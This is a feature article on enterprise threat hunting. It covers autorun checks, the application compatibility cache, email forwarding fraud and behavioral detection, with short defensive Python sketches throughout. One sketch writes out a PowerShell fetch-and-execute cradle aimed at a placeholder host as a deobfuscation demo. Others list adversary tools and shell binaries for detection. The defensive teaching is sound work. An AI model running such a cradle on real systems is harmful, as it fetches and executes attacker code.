Maria Korolov
Contributing writer

Tips and tactics of today’s cybersecurity threat hunters

Feature
May 03, 2021 | 14 mins
Advanced Persistent Threats | Security | Threat and Vulnerability Management

Having internal threat hunting capability is becoming a necessity for many organizations. Here are the most common things they look for and how they respond to incidents.

Credit: Roz Woodward / Getty Images / Target

Threat hunting isn’t just for the biggest organizations anymore. As the SolarWinds attack demonstrated, any size company can be vulnerable to stealthy attackers who worm their way into the enterprise. Even if a company has no assets of interest to foreign spies, financially motivated cybercriminals can use the same access points and evasion techniques.

According to IBM’s Cost of a Data Breach Report 2020, the average organization takes 315 days to detect and contain a breach caused by a malicious attack. The longer the attackers stay inside your systems, the more money it costs. According to IBM, it costs companies an additional $1.12 million if it takes them more than 200 days to detect a breach.

As a result, more companies are hiring threat hunters, training existing staff on threat hunting techniques, or hiring outside firms to provide threat hunting services. “Threat hunting is absolutely a necessity in modern cyber defense,” says Mark Orlando, co-founder and CEO at Bionic Cyber, who teaches threat hunting for the SANS Institute and previously worked on security issues for the Pentagon, White House, and the Department of Energy.

“When I first started in security operations, threat hunting sounded cool, but it was something that only the most advanced teams did,” Orlando says. “It was optional, but now you have these high profile breaches that would not have been discovered unless you had skilled investigators who know how to hunt for these threats. There’s now an awareness that it’s not optional.”

Tips to enhance threat hunting capabilities

Orlando admits that it’s hard to find experienced threat hunters, especially for smaller and mid-sized firms. “But there are lots of things a smaller organization can do to get started. It’s not something where you either have it or you don’t—it’s a continuum.”

If something like SolarWinds happens, he says, all it takes is the ability to read the reports, think about what happened, assess how those threats could show up in your organization, and then apply that knowledge. “That’s all it is—the key is just getting started,” Orlando says. “That tends to be a challenge for medium and smaller organizations.”

Companies can also bring in consultants or service providers or train their existing staff, Orlando says. “That’s something that can be a very minimal investment but can really pay off by making you more resistant to those kinds of attacks.”

It’s not just security teams that can benefit. “If you have software development teams, system administrators, make sure they’re up to speed on modern cyber threats,” says Orlando. “They’re on the front lines of maintaining other systems, and maintaining software like SolarWinds, and they might be in a position to identify something that doesn’t look right.”

What threat hunters do

Threat hunters always have something to do, but they really go into action when there’s an indicator of compromise. Maybe, as with FireEye, corporate assets turn up for sale on the dark web. Or maybe a company learns of indicators that attackers used its compromised SolarWinds software as an entry point. Maybe it’s an alert from an intrusion detection system or a honeypot, or a supplier complains that the money you sent them never arrived. It could be something big and obvious, like a ransomware attack.

Threat hunters determine the extent of the threat, find the initial entry point and close it off, and find and shut down any backdoors or time bombs that may have been installed so that the attackers can be fully cleaned out of the environment.

Here are examples of how they do it.

Check the autoruns

Many systems have an “autorun” function—a set of instructions that executes each time the device is turned on. For example, if malware is detected on a computer and deleted, an autorun might reinstall it.

Checking the autorun instruction sets not only ensures that the malware doesn’t come back, it’s also a way to spot suspicious activity on a system. “In a corporate network, there are going to be thousands of these things,” says Orlando. “Every computer is going to have that list. If you can pull that list together every single day and compare it from one day to the next, you can start to pick up things that are unusual or don’t look right.” That can take a little skill. “You don’t always know what you need to look for,” he says.
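The daily comparison Orlando describes can be sketched in a few lines. This is a minimal illustration with hypothetical data; in practice the per-host inventories would come from a collection tool such as Sysinternals Autoruns exported once a day.

```python
# Sketch: diff daily autorun inventories to surface entries that appeared
# overnight. Host names and paths below are made up for illustration.

def new_autoruns(yesterday, today):
    """Return autorun entries present today but absent yesterday, keyed by host."""
    findings = {}
    for host, entries in today.items():
        baseline = set(yesterday.get(host, []))
        added = sorted(set(entries) - baseline)
        if added:
            findings[host] = added
    return findings

yesterday = {
    "ws-014": ["C:\\Windows\\explorer.exe", "C:\\Program Files\\AV\\av.exe"],
}
today = {
    "ws-014": ["C:\\Windows\\explorer.exe", "C:\\Program Files\\AV\\av.exe",
               "C:\\Users\\Public\\update.vbs"],  # new entry, worth a look
}

for host, added in new_autoruns(yesterday, today).items():
    print(host, added)
```

The diff itself is trivial; the skill Orlando mentions lies in triaging the output, since legitimate software updates also add autorun entries every day.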

It also takes planning. Threat hunters can’t comb through logs that aren’t there or that the attackers have modified to cover their tracks. Enterprises need to make copies of logs and store them in a safe location, such as a SIEM, so that they’re available if needed later.

Figuring out what to keep is a challenge, Orlando says. “You want to have all the visibility and get all the logs and network data but at the same time in a modern network, that’s potentially a very tall order. We’re generating tons and tons of data every single day. It’s not always financially viable to just collect everything.”

Lately, attackers have been using autoruns more cleverly, to execute malware without ever installing anything at all. That’s been showing up in the recent spate of attacks that leveraged the Microsoft Exchange vulnerability, says John Hammond, senior security researcher at Huntress. “Oftentimes, what we would see following the compromise of the Exchange server was ransomware, but what was even more common were cryptocurrency miners,” he says. “It’s a slower way of making money compared to the immediate loud and blatant ransomware.”

Since it’s a slow method, the malware has to be hidden extremely well. He cites a recent example of a local government customer. “They’re aware of the news reports, and they saw some strange traffic,” Hammond says. Some alerts were coming from a machine, but no malware was installed. Instead, it turned out that the attackers had buried their malware like a Russian doll inside an autorun file.

An obfuscated Visual Basic script would spawn a PowerShell script that used hex encoding to hide the fact that it was reaching out to an online endpoint, pulling down code, and invoking it on the fly without ever installing it on the computer. The final piece of the puzzle was the Lemon Duck cryptominer, Hammond says.

“In this specific situation, there were five layers where it would invoke new code on the fly,” Hammond says. “Eventually, in the sixth stage, we find the actual code. That’s the fileless malware. The attackers aren’t going to touch disk; they’ll bundle it up like an onion.”
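Unwrapping that kind of layered payload can be approximated with a loop that keeps decoding until no more encoded stages remain. This is a toy sketch, not the actual Lemon Duck dropper: the sample script text, the hex-only encoding, and the layer count are all invented for illustration, whereas real samples mix Base64, compression, and string splitting.

```python
import re

def peel_hex_layers(payload, max_layers=10):
    """Repeatedly decode long hex-encoded blobs until the final stage appears."""
    layers = [payload]
    for _ in range(max_layers):
        match = re.search(r"[0-9a-fA-F]{20,}", layers[-1])
        if not match:
            break
        layers.append(bytes.fromhex(match.group(0)).decode("utf-8", errors="replace"))
    return layers

# Build a toy two-layer sample: a download cradle wrapped in hex twice.
inner = "IEX(New-Object Net.WebClient).DownloadString('http://example.test/p')"
layer1 = "powershell -enc " + inner.encode().hex()
layer2 = "wscript payload " + layer1.encode().hex()

layers = peel_hex_layers(layer2)
print(len(layers))   # 3: the original plus two decoded stages
print(layers[-1])    # the innermost download cradle
```

Each decoded stage goes back through the same search, mirroring the onion-like structure Hammond describes, where the real payload only appears at the final layer.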

After that, the team found a few other machines that had the same infection. “It had been running for a few days,” Hammond says. “Our recommendation was to remove the autorun, scrub it clean, remove it from orbit.”

Mine the application compatibility cache

A big manufacturing company suspected that it may have been targeted by attackers. Tim Bandos, CISO and VP of managed security services at Digital Guardian, says that the first footprints that were discovered were in an endpoint’s application compatibility cache. This is a Windows registry key that basically keeps a record of the programs that execute on a device. “The customer had 90,000 endpoints,” he says. “We looked at the application compatibility cache on every single device and searched for any known adversary tools.”

There was a hit—a year and half ago, a suspicious program ran on one of the endpoint devices. “We found ten machines that executed that program on the same date,” Bandos says, a sign that the adversary was moving laterally. “Then we found more indicators. They even installed backdoors over that year and a half, all while remaining undercover.”
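The hunt Bandos describes boils down to two steps: match cache entries against known adversary tooling, then cluster the hits by date to spot coordinated execution. A minimal sketch, with a hypothetical tool list and entry format (real entries would come from a registry parser that reads the AppCompatCache key):

```python
from collections import defaultdict

# Known adversary tool names below are common examples, not Bandos's actual list.
KNOWN_BAD = {"psexec.exe", "mimikatz.exe", "wce.exe"}

def hunt(entries):
    """entries: list of (host, path, date) tuples parsed from each endpoint's
    application compatibility cache. Returns dates where several hosts ran a
    known-bad tool, a possible sign of lateral movement."""
    hits_by_date = defaultdict(set)
    for host, path, date in entries:
        name = path.rsplit("\\", 1)[-1].lower()
        if name in KNOWN_BAD:
            hits_by_date[date].add(host)
    return {d: sorted(hosts) for d, hosts in hits_by_date.items() if len(hosts) > 1}

entries = [
    ("srv-01", "C:\\Temp\\psexec.exe", "2019-11-02"),
    ("srv-07", "C:\\Temp\\PsExec.exe", "2019-11-02"),
    ("ws-112", "C:\\Windows\\notepad.exe", "2019-11-02"),
]
print(hunt(entries))   # multiple hosts, same tool, same date
```

Grouping by date is what turned one hit into ten machines in Bandos's case: the same suspicious program executing across hosts on a single day is a much stronger signal than any one entry alone.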

By pulling on that first thread, Bandos says, his team discovered an attack that was still ongoing, in which the attackers had compromised more than 70 machines in all, installed several different types of backdoors on 22 devices, and had already stolen data. “It was impossible to determine everything that was taken,” he says, “but we were able to find examples of trade secrets that were stolen. We were able to identify the attackers, a nation-state adversary from China.”

His team also tracked the infection back to its starting point. “It was a supply chain type of attack,” Bandos says. “There was a shipping device that had been breached, a device that they didn’t even manage but was on their network. It was leveraged to piggyback into their environment.”

It’s vital to follow the threat back to its source, not only to close off the original point of entry, but also to determine where else they may have gone from that initial infection. “Make sure you’ve got every system, that there aren’t any other infected machines,” Bandos says. “Then you have your neutralization event—you shut down all the hosts involved in that campaign all at the same time, so there are no open backdoors, and re-image all the devices so they’re all completely wiped.”

Look for forwarded emails

Mailboxes are wonderful targets for attackers, including the gang behind the SolarWinds hack. With a compromised email account, attackers can inject themselves into the middle of conversations, dramatically increasing the odds that their phishing emails will be clicked on. Some multifactor authentication systems allow for email delivery of one-time passwords or allow email-based password resets, enabling attackers to leverage those email accounts to get access to even more systems.

Email compromise is big business. According to the FBI, cybercrime was up 300% last year, with total reported losses exceeding $4.2 billion—and business email compromise scams were the biggest category of crimes. To keep these scams going as long as possible, attackers use a trick: email forwarding.

Most platforms allow emails to be automatically forwarded to other accounts. Attackers can use this so that they can continue to eavesdrop on conversations and make their own scam emails more believable. Sometimes, they use it to cover up ongoing criminal activity, says Willis McDonald, technical principal at Nisos and a former FBI forensics expert.
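Auditing forwarding rules for external destinations is a quick hunt to automate. The sketch below assumes a flat export of rules (mailbox plus forwarding target); the record format and the `example.com` domain are invented, and a real hunt would pull this from an Exchange or Microsoft 365 admin export.

```python
COMPANY_DOMAIN = "example.com"   # assumption for this sketch

def suspicious_forwards(rules):
    """Flag auto-forwarding rules whose target is outside the company domain."""
    flagged = []
    for rule in rules:
        target = rule["forward_to"].lower()
        domain = target.split("@")[-1]
        if domain != COMPANY_DOMAIN:
            flagged.append((rule["mailbox"], target))
    return flagged

rules = [
    {"mailbox": "cfo@example.com", "forward_to": "assistant@example.com"},
    {"mailbox": "supervisor@example.com", "forward_to": "drop@freemail.test"},
]
print(suspicious_forwards(rules))
```

External forwards aren't always malicious, but each one is worth a question, since a single quiet rule is all an attacker needs to eavesdrop on a conversation indefinitely.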

McDonald has hunted threats in companies of all sizes, in financial institutions, and in government agencies around the world, and has often been called in when companies suspect fraudulent activity. One recent case was a large manufacturing company with offices around the globe that suspected a problem in its accounts payable department. “They were sourcing materials from many different countries and foreign suppliers,” he says. That made it easy for one individual to hide his criminal activity, diverting payments from one such supplier into his own accounts.

“After a couple of months, the supplier contacted the CFO and the CFO looked into it, realized that they hadn’t been paid, and called us to investigate,” says McDonald. They already had a suspect—the accounts payable employee. “This person was a little more nervous than they should be.”

The thief took quite a few precautions to cover their tracks, he says. At first glance it looked like some random external hacker had done it. “They wanted to be sure that they had the right person.”

The initial clue to the real perpetrator was a rule in a supervisor’s email account that forwarded the supplier’s real emails and erased them, so that the crook could replace them with fake emails from a dummy account. How did McDonald know to look in the forwarding settings? “In a lot of these compromises, the bad actors all go to the same school,” he says.

He means that literally: Criminals can take actual classes that teach them how to commit these kinds of frauds. “We monitored some of the back and forth between the tutors and the students, saw what types of steps they were taking,” says McDonald.

Criminals can find tutors on the dark web, McDonald says, as well as other services they need to carry out the frauds, such as money mules. This means that criminals often follow the same playbook. “The downside, for the criminal, is that they all perform the same steps, in the same order, and they look eerily similar to each other,” he says. “It can be pretty easy to start pulling at threads.”

A common tactic the thieves use to extend their scams is to intercept emails from the legitimate recipients of the money. Say an email complaining about a payment not being received is intercepted and forwarded to the hacker, and the original erased. The hacker would then send a replacement email from a fake account that looks like the real one, confirming that the payment had been received, and written in a style and format to match the legitimate one.

That’s exactly what had happened in this case. The thief had registered a domain that was similar to that of the supplier, set up a fake email account, and then surreptitiously accessed their supervisor’s email account and set up the forwarding. The thief’s plan was to look just like an external party in a business email compromise scam.
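Lookalike domains of the kind the thief registered can be hunted by measuring edit distance between observed sender domains and the domains of known suppliers. A sketch with invented domain names, using the classic Levenshtein distance:

```python
def edit_distance(a, b):
    """Levenshtein distance between two strings, via the standard DP table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,          # deletion
                           cur[j - 1] + 1,       # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]

def lookalikes(known_domains, observed_domains, max_dist=2):
    """Flag observed domains within a few edits of a known legitimate domain."""
    hits = []
    for obs in observed_domains:
        for known in known_domains:
            d = edit_distance(obs, known)
            if 0 < d <= max_dist:
                hits.append((obs, known, d))
    return hits

known = ["acme-supplier.com"]
observed = ["acme-suppiler.com", "unrelated.org"]
print(lookalikes(known, observed))  # the transposed 'il' is two edits away
```

A distance of one or two edits against a supplier you actually do business with is exactly the pattern of a business email compromise dummy domain.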

Now, the threat hunters had a thread to pull on. They discovered that the thief set up the dummy account using their own work computer. “They tried to delete the evidence, but there were remnants on their computer.” Companies will often have logs of who was logged into a system when forwarding was set up, so the criminals can be traced that way as well. Or there might be security cameras showing who had access to the computer at the time of the compromise.

It helps if companies have full access to employee devices, McDonald says. “In many places with bring-your-own-device policies, those policies don’t have the teeth needed to actually be able to examine that device if it’s been used for suspected malicious purposes.” Whether the employee was involved or was a victim, forensic investigation of the device can help uncover what really happened. “It’s important to review the policies you have and make sure they have what you need to examine devices if something strange is going on.” That’s especially important with so many people working from home.

This thief also tried to cover their tracks financially. The redirected payment was sent to a money mule. Instead of hiring an anonymous mule on the dark web, they used a friend of a relative.

If the thief had avoided using their work computer, there are still ways to catch them. “There are ways to work with law enforcement and get more information from the hosting provider,” says McDonald. If the IP addresses track back to an employee’s home or a local coffee shop, that’s an indication that the bad guys aren’t random hackers on the other side of the planet but someone close by and within reach of authorities.

The SolarWinds attack has added a new wrinkle to the mailbox scam, McDonald says. Some companies have duplicate Outlook or Exchange servers, either self-hosted or somewhere in the cloud. These legacy servers tend to be ignored, he says. “They’re so noisy with external scans and failed attacks throughout the day.” Or worse, the company has forgotten about them. They’ve moved to Office 365, but left one server up and running because, say, that’s where the CEO has always checked his email and that’s how he likes it.

“In the SolarWinds incident, the attackers were able to compromise these mostly legacy Exchange servers and use them to download mailboxes and extend their access into networks, into hosted services like Office 365 or AWS, with very little indication of how they were able to do this,” says McDonald.

Think like an attacker

Another strategy that threat hunters use is to put themselves in the adversary’s shoes, says Steve Luke, senior principal multi-discipline system engineer at MITRE, which recently launched its MITRE ATT&CK Defender certification program for threat hunters.

Consider the steps an attacker must go through to get to your company’s trade secrets, customer databases, or other valuable data. “What attackers do at the behavioral level is more limited in number and more difficult for the attacker to change compared to the traditional indicators of compromise like domain names and IP addresses,” Luke says.

That gives the defenders a home field advantage. “Focus on the behavioral invariants and design your mitigations around those,” says Luke. “Even if they make a change in how they’re doing it, you still have a chance of detecting it. That’s the best chance a threat hunter has of having a resilient defense.”
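A behavioral rule in the spirit Luke describes looks at *what* a process does rather than matching brittle indicators like hashes or IP addresses. The sketch below flags an office application spawning a command shell, a common malicious-document behavior; the event fields and process lists are hypothetical stand-ins for what an EDR feed would provide.

```python
# Behavior-based rule: match on parent/child relationships, not indicators.
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe"}

def flag_suspicious_spawns(process_events):
    """process_events: list of dicts with 'parent' and 'child' image names."""
    return [
        e for e in process_events
        if e["parent"].lower() in OFFICE_APPS and e["child"].lower() in SHELLS
    ]

events = [
    {"parent": "explorer.exe", "child": "winword.exe"},   # normal
    {"parent": "WINWORD.EXE", "child": "powershell.exe"}, # behaviorally odd
]
print(flag_suspicious_spawns(events))
```

An attacker can trivially rotate domains and recompile a payload to change its hash, but avoiding the parent-child behavior itself means reworking their tradecraft, which is Luke's point about behavioral invariants being harder to change.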